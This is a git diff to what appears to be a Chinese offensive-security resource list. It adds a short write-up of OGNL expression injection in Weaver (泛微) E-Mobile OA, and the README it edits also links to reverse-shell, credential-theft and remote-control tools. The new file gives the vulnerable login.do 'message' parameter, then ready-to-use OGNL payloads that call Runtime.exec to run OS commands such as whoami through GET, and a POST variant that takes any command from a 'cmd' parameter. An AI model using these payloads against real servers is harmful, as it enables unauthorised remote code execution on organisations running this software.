diff --git a/README.md b/README.md index 1e7f097..8886a4d 100644 --- a/README.md +++ b/README.md @@ -9,7 +9,7 @@ - [提权辅助相关](#提权辅助相关) - [PC](#PC) - [tools](#tools-小工具集合) - - [books](#书籍相关) + - [books](#书籍/文章/教程相关) - [说明](#%E8%AF%B4%E6%98%8E) ## IOT Device @@ -133,6 +133,7 @@ - [CVE-2020-2555:WebLogic RCE漏洞POC](https://mp.weixin.qq.com/s/Wq6Fu-NlK8lzofLds8_zoA)|[CVE-2020-2555-Weblogic com.tangosol.util.extractor.ReflectionExtractor RCE](https://github.com/Y4er/CVE-2020-2555) - [CVE-2020-1947-Apache ShardingSphere UI YAML解析远程代码执行漏洞](https://github.com/jas502n/CVE-2020-1947) - [CVE-2020-0554:phpMyAdmin后台SQL注入](./CVE-2020-0554:phpMyAdmin后台SQL注入.md) +- [泛微E-Mobile Ognl 表达式注入](./泛微e-mobile%20ognl注入.md)|[表达式注入.pdf](./books/表达式注入.pdf) ## 提权辅助相关 @@ -205,7 +206,6 @@ - [PHP解密扩展](https://github.com/Albert-Zhan/php-decrypt) - [linux信息收集/应急响应/常见后门检测脚本](https://github.com/al0ne/LinuxCheck) - [RdpThief-从远程桌面客户端提取明文凭据辅助工具](https://github.com/0x09AL/RdpThief) -- [织梦(DEDECMS)全版本漏洞扫描](https://github.com/Mr-xn/dedecmscan) - [使用powershell或CMD直接运行命令反弹shell](https://github.com/ZHacker13/ReverseTCPShell) - [FTP/SSH/SNMP/MSSQL/MYSQL/PostGreSQL/REDIS/ElasticSearch/MONGODB弱口令检测](https://github.com/netxfly/x-crack) - [GitHack-.git泄露利用脚本](https://github.com/lijiejie/GitHack) @@ -259,7 +259,7 @@ - [NodeJsScan-一款转为Nodejs进行静态代码扫描开发的工具](https://github.com/ajinabraham/NodeJsScan) - [一款国人根据poison ivy重写的远控](https://github.com/killeven/Poison-Ivy-Reload) -## 书籍相关 +## 书籍/文章/教程相关 - [windwos权限维持系列12篇PDF](./books/Window权限维持) - [Linux 权限维持之进程注入(需要关闭ptrace)](./books/Linux%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E4%B9%8B%E8%BF%9B%E7%A8%8B%E6%B3%A8%E5%85%A5%20%C2%AB%20%E5%80%BE%E6%97%8B%E7%9A%84%E5%8D%9A%E5%AE%A2.pdf) | [在不使用ptrace的情况下,将共享库(即任意代码)注入实时Linux进程中。(不需要关闭ptrace)](https://github.com/DavidBuchanan314/dlinject) @@ -279,6 +279,7 @@ - [国外详细的CTF分析总结文章(2014-2017年)](https://github.com/ctfs) - [这是一篇“不一样”的真实渗透测试案例分析文章-从discuz的后台getshell到绕过卡巴斯基获取域控管理员密码](./books/这是一篇"不一样"的真实渗透测试案例分析文章-从discuz的后台getshell到绕过卡巴斯基获取域控管理员密码-%20奇安信A-TEAM技术博客.pdf)|[原文地址](https://blog.ateam.qianxin.com/post/zhe-shi-yi-pian-bu-yi-yang-de-zhen-shi-shen-tou-ce-shi-an-li-fen-xi-wen-zhang/) - [CobaltStrike4.0用户手册_中文翻译_3](./books/CobaltStrike4.0用户手册_中文翻译_3.pdf) +- [表达式注入.pdf](./books/表达式注入.pdf) ## 说明 diff --git a/books/表达式注入.pdf b/books/表达式注入.pdf new file mode 100644 index 0000000..06b2ee5 Binary files /dev/null and b/books/表达式注入.pdf differ diff --git a/img/55.png b/img/55.png new file mode 100644 index 0000000..d2c30ad Binary files /dev/null and b/img/55.png differ diff --git a/img/56.png b/img/56.png new file mode 100644 index 0000000..268a907 Binary files /dev/null and b/img/56.png differ diff --git a/img/57.png b/img/57.png new file mode 100644 index 0000000..b02557c Binary files /dev/null and b/img/57.png differ diff --git a/img/58.png b/img/58.png new file mode 100644 index 0000000..dfcd24a Binary files /dev/null and b/img/58.png differ diff --git a/img/59.png b/img/59.png new file mode 100644 index 0000000..8ce74e6 Binary files /dev/null and b/img/59.png differ diff --git a/泛微e-mobile ognl注入.md b/泛微e-mobile ognl注入.md new file mode 100644 index 0000000..4daab68 --- /dev/null +++ b/泛微e-mobile ognl注入.md @@ -0,0 +1,63 @@ +## 泛微e-mobile ognl注入 + +泛微 E-Mobile 表达式注入?大概?这个洞是一个月以前,老师丢给我玩的,叫我学习一下。 +拿到的时候一脸懵逼,什么是表达式注入?去漏洞库看了一圈。 +(・。・) 噢!原来可以执行算术运算就是表达式注入呀! +要怎么玩?当计算器用么?~ヾ(*´∇`)ノ + +一、泛微OA E-Mobile WebServer:**Apache** 通用部分:**apache** +官方有两个OA。一个是**apache**的 一个是**Resin**的。 +**Resin**的也找到姿势通杀了,但是**Resin**涉及的站太大了。。。暂时不放出来,因为好像和S2撞洞了?因为045打了WAF的 ,我这个可以执行命令。23333 我也不知道~ + +``` +1、登录页面如下 + +http://6.6.6.6/login.do? +or +http://6.6.6.6/login/login.do? +``` + +![](./img/55.png) + +``` +2、当账号密码报错的时候,出现如下URL +login.do?message=104&verify= +``` + +![](./img/56.png) + +``` +3、直接改写message=的内容,试试算术运算。 +http://6.6.6.6/login.do?message=66*66*66-66666 +``` + +![](./img/57.png) + +o(>ω<)o 这么神奇么~ + +``` +4、表达式注入。 +有的表达式注入是${code}。这里隐藏了${},所以直接调用就行了。 +message=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('whoami').getInputStream()) +``` + +![](./img/58.png) + +``` +5、也可以通过`post`提交数据来进行注入,命令执行 +`post`如下数据也可以: +message=(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()))).(#w.close())&cmd=whoami +``` + +![](./img/59.png) + +参考: + +http://sh0w.top/index.php/archives/14/ + +http://sh0w.top/index.php/archives/39/ + +https://mp.weixin.qq.com/s/EbzjQvHTl7k9flG-7lqAvA + +其他表达式相关文章:[表达式注入.pdf](./books/表达式注入.pdf)|[原文地址](https://misakikata.github.io/2018/09/表达式注入/) +